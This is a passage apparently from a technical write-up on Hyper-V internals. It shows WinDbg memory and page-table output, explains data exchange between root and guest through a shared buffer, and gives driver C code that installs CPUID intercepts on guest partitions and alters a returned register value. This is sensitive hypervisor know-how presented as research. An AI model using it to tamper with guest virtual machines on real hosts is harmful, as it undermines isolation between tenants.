<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d60 00790065 00000000 00000000 00000000 e.y.............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d70 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d80 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21f40 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21f50 0076004b 00440050 00740061 00560061 K.v.P.D.a.t.a.V.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21f60 006c0061 00650075 00000000 00000000 a.l.u.e.........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21f70 00000000 00000000 00000000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!pte ffffd001`6ff21f50</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VA ffffd0016ff21f50</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PXE at FFFFF6FB7DBEDD00 PPE at FFFFF6FB7DBA0028 PDE at FFFFF6FB74005BF8 PTE at FFFFF6E800B7F908</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">contains 0000000000225863 contains 00000000003B7863 contains 000000010FB12863 contains 80000001367BF963</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pfn 225 ---DA--KWEV pfn 3b7 ---DA--KWEV pfn 10fb12 ---DA--KWEV pfn </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1367bf</span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-G-DA--KW-V</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then after the completion of the PkGetReceiveBuffer function PipeTryReadSingle copies the data from the shared-buffer using memmove. The block size (in this case A28) is specified directly in the block, but if the number is greater than 4000h the copying is not performed. Thus it is seen that the exchange of data between the root OS and the guest OS uses a shared buffer, and the interface of hypervisor is used only to notify the root OS that the data must be read from this buffer. In principle, the same operation could be done by sending multiple messages using winhv!HvPostMessage, but this would lead to a significant performance degradation.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.The use of the interception interface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Configure a hypervisor to send notification to root OS in case if one of the guest OS executes cpuid with the 0x11114444. For this hyper-v provides an interface in the form of an hypercall HvInstallIntercept. There is function SetupIntercept In hyperv4 driver, which takes a list of identifiers of all active guest operating systems and calls for each one WinHvInstallIntercept.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">int</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> SetupIntercept()</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_INTERCEPT_DESCRIPTOR</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Descriptor;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_INTERCEPT_PARAMETERS</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Parameters = {0};</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> hvStatus = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PARTITION_ID</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PartID = 0x0, NextPartID = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> If the instructions in rax contains the cpuid instruction the value 0x11114444 will be passed,</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the hypervisor will intercept and send the message to the parent section to process the result</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"SetupInterception was called"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Parameters.CpuidIndex = 0x11114444;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Descriptor.Type = HvInterceptTypeX64Cpuid;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Descriptor.Parameters = Parameters;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvStatus = WinHvGetPartitionId(&PartID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">do</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvStatus = WinHvGetNextChildPartition(PartID, NextPartID, &NextPartID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (NextPartID != 0){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Child partition id"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, NextPartID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> hvStatus = WinHvInstallIntercept(NextPartID, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_INTERCEPT_ACCESS_MASK_EXECUTE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, &Descriptor);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"hvstatus of WinHvInstallIntercept = "</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, hvStatus);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">while</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ((NextPartID != </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PARTITION_ID_INVALID</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) && (hvStatus == 0));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also change the PrintCpuidInterceptMessage so that it is in the case, if the guest OS EAX register (or RAX, if the code executes instructions CPUID is performed in longmode) contains the number 0x11114444, it is recorded in the field DefaultResultRdx of structure HV_X64_CPUID_INTERCEPT_MESSAGE which is located in the zero slot SIM with, the value of 0x12345678:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">void</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PrintCpuidInterceptMessage(</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: grey; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvMessage</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_X64_CPUID_INTERCEPT_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> phvCPUID = (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_X64_CPUID_INTERCEPT_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: white; color: grey; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvMessage</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Payload;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->DefaultResultRax"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvCPUID->DefaultResultRax);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->DefaultResultRbx"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvCPUID->DefaultResultRbx);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->DefaultResultRcx"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvCPUID->DefaultResultRcx);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->DefaultResultRdx"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvCPUID->DefaultResultRdx);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (phvCPUID->Rax == 0x11114444){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->DefaultResultRdx = 0x12345678;</span></div>
